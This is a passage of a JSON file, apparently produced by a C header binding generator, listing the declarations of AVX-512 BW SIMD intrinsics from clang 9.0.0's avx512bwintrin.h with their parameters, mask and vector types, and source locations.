}, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_adds_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:654:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_adds_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:662:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_adds_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:668:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_adds_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:676:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_adds_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:684:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_adds_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:690:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_adds_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:698:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_avg_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:706:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_avg_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:712:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_avg_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:721:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_avg_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:729:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_avg_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:735:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_avg_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:744:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_max_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:752:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_max_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:758:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_max_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:766:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_max_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:774:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_max_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:780:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_max_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:788:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_max_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:797:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_max_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:803:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_max_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:811:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_max_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:819:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_max_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:825:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_max_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:833:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_min_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:841:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_min_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:847:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_min_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:855:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_min_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:863:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_min_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:869:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_min_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:877:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_min_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:885:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_min_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:891:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_min_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:899:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_min_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:907:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_min_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:913:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_min_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:921:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_shuffle_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:929:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_shuffle_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:935:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_shuffle_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:943:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_subs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:951:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_subs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:957:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_subs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:965:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_subs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:973:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_subs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:979:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_subs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:987:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_subs_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:995:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_subs_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1001:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_subs_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1009:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_subs_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1017:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_subs_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1023:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_subs_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1031:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_permutex2var_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1039:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_permutex2var_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1046:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask2_permutex2var_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1055:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_permutex2var_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1064:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mulhrs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1073:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_mulhrs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1079:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_mulhrs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1087:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mulhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1095:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_mulhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1101:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_mulhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1110:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mulhi_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1118:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_mulhi_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1124:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_mulhi_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1132:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maddubs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1140:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_maddubs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512bwintrin.h:1145:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__Y", "type": { "tag": "__m512i" } }], "return-type": { "tag": 